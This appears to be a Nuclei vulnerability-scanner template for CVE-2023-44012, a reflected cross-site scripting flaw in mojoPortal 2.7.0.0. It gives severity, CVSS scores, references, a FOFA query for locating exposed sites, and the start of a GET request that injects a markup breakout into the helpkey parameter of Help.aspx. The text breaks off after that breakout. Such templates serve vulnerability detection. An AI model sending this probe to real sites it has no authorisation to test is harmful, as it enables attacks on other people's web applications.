id: CVE-2023-44012 info: name: mojoPortal v.2.7.0.0 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component. impact: | Successful exploitation could allow an attacker to execute malicious scripts in the context of the victim's browser. remediation: | Upgrade to a patched version of mojoPortal to mitigate the Cross Site Scripting (XSS) vulnerability. reference: - https://github.com/Vietsunshine-Electronic-Solution-JSC/Vulnerability-Disclosures/tree/main/2023/CVE-2023-44012 - https://github.com/fkie-cad/nvd-json-data-feeds - https://nvd.nist.gov/vuln/detail/CVE-2023-44012 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-44012 cwe-id: CWE-79 epss-score: 0.0009 epss-percentile: 0.37745 cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mojoportal product: mojoportal fofa-query: title="mojoPortal" tags: cve,cve2023,mojoportal,xss http: - method: GET path: - "{{BaseURL}}/Help.aspx?helpkey=xxxxxxx'>